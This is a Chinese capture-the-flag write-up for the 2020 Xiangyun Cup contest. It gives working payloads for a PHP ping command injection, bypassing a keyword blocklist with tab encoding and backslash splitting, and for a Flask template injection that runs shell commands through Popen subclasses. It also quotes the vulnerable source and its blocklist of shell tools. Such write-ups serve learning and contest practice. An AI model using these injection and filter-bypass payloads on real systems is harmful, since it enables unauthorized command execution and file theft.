2020 “祥云杯”网络安全大赛
in Study on Writeup, Ctf
上午做了两个Web就歇了,其他都是学弟做的 战队排名:172
首届“祥云杯”网络安全大赛
签到
base64直接解
Command
这题拿了个二血 也没什么额外的加分 没多久分值就白菜了
fuzz了一下 发现过滤不多
用%09绕过空格过滤 ca\t绕过cat的过滤
搜索了一下flag的位置
Result:/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:03.0/virtio0/net/eth0/flags
/sys/devices/virtual/net/dummy0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/usr/share/perl/5.18.2/IO/Uncompress/AnyInflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Adapter/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/RawInflate.pm
/usr/share/perl/5.18.2/IO/Compress/RawDeflate.pm
/usr/share/perl/5.18.2/IO/Compress/Adapter/Deflate.pm
/usr/share/perl/5.18.2/IO/Compress/Deflate.pm
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/lib/apache2/modules/mod_deflate.so
/etc/.findflag
/etc/.findflag/flag.txt
/etc/apache2/mods-available/deflate.conf
/etc/apache2/mods-available/deflate.load
/etc/apache2/mods-enabled/deflate.conf
/etc/apache2/mods-enabled/deflate.load
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/kpageflags
/var/lib/apache2/module/enabled_by_maint/deflate
flag文件位置:/etc/.findflag/flag.txt
payload:http://eci-2zechif0ewh04tj7nhh9.cloudeci1.ichunqiu.com/index.php?url=%7Cca%5Ct%09%2Fetc%2F.find%3F%3F%3F%3F%2F%3F%3F%3F%3F.%3F%3F%3F
最后才读取了一下题目源码 看了一下过滤的列表
<?php
error_reporting(0);
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)){
die("<script language='javascript' type='text/javascript'>
alert('no no no!')
window.location.href='index.php';</script>");
}else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("<script language='javascript' type='text/javascript'>
alert('no flag!')
window.location.href='index.php';</script>");
}
$a = shell_exec("ping -c 4 ".$ip);
}
?>
flaskbot
根据debug信息 爆出部分源码
/usr/local/lib/python2.7/site-packages/flask/app.py
...
#以下是46行
user=request.cookies.get('user')
if user == None
return render_template("index.html")
else:
user=user.encode('utf-8')
return render_template("guess.html",name=base64.urlsafe_b64decode(user))
@app.route('/guess',methods=['POST'])
def Guess():
user=request.cookies.get('user')
if user==None:
return redirect(url_for("Hello"))
user=user.encode('utf-8')
name = base64.urlsafe_b64decode(user)
num = float(request.form['num'])
if(num<0):
return "Too Small"
elif num>1000000000.0:
return "Too Large"
else:
return render_template_string(guessNum(num,name))
@app.errorhandler(404)
def miss(e):
return "What are you looking for?!!".getattr(app, '__name__', getattr(app.__class__, '__name__')), 404
if __name__ == '__main__':
f_handler=open('/var/log/app.log', 'w')
sys.stderr=f_handler
app.run(debug=True, host='0.0.0.0',port=8888)
<div id="wrapper">
<section id="main">
<header
<span class="avatar"><img src="static/images/avatar.jpg" alt="" /></span>
<h1>Guessing Robot</h1>
<p>Hi { {name} }.I'm good at guessing numbers!</p>
</header>
<hr />
<h2>Input your Lucky Num(0.0-1000000000.0)</h2>
后来发现当传入数字为NaN时 可以直接执行name中的代码
构建payload
{ {''.__class__.__mro__[2].__subclasses__()[258]('ls', shell=True, stdout=-1).communicate()[0].strip()} }
经过Fuzz发现过滤了* ? flag 所以构建了一下payload
{ {''.__class__.__mro__[2].__subclasses__()[258]('cat /super_secret_fl\\ag.txt', shell=True, stdout=-1).communicate()[0].strip()} }
进制反转
帮学弟写了个反转的辣鸡脚本
from os import write
file = open("./flag")
output = open("./output","w+c")
for line in file:
for i in line:
if i == '0':
i = '1'
elif i == '1':
i = '0'
output.write(i)
最后吐槽
感觉现在的 CTF 比赛 py 成风,出题重复度也高,很多题在网上都能搜得到高度相似的,打 CTF 也没有以前那种探索的热情了,大概就是做几道不浪费时间的,其他感兴趣的等一波 wp 就算是完成一次比赛了。